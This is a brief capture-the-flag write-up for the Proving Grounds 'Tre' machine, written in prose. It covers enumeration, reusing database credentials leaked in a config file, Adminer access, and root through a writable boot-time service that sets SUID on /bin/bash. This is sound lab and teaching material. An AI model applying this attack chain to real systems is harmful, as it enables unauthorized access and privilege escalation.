Tre - Proving Grounds Play
Enumeration
Nmap
Initial Nmap scan revealed SSH, HTTP ports were open.
Dirbuster
Applied directory brute forcing to Web application which revealed some endpoints.
Then applied additional brute forcing to mantisbt directory which revealed config endpoint.
Visiting the config endoint revealed a file named ‘a.txt’ which included database username and password.
Exploitation
Adminer
I knew from the first directory brute force that adminer application was available. I logged in to the application using found DB credentials. Later, I ran an SQL query which revealed users.
User Flag
Then using revealed credentials I got the user.
Privilege Escalation
sudo -l
Sudoers file revealed that I could run shutdown as root user without password.
Linpeas
And linpeas revealed that ‘check-system’ file was writeable by me.
Analyzing check-system
Moreover, checking with the ‘ps -ef’ command shows that ‘check-system’ command’s Parrent PID (PPID) is 1 and its start time is equals to the machine boot time. This means, the check-system process run right after the boot.
Or we can run ‘systemctl status check-system.service’, and if the service is valid we know that it is a system daemon.
Root
Then I simply updated check-system file to give SUID privileges to /bin/bash as root. Then rebooted using shutdown command.
Then I exploited the SUID bit and got the root flag.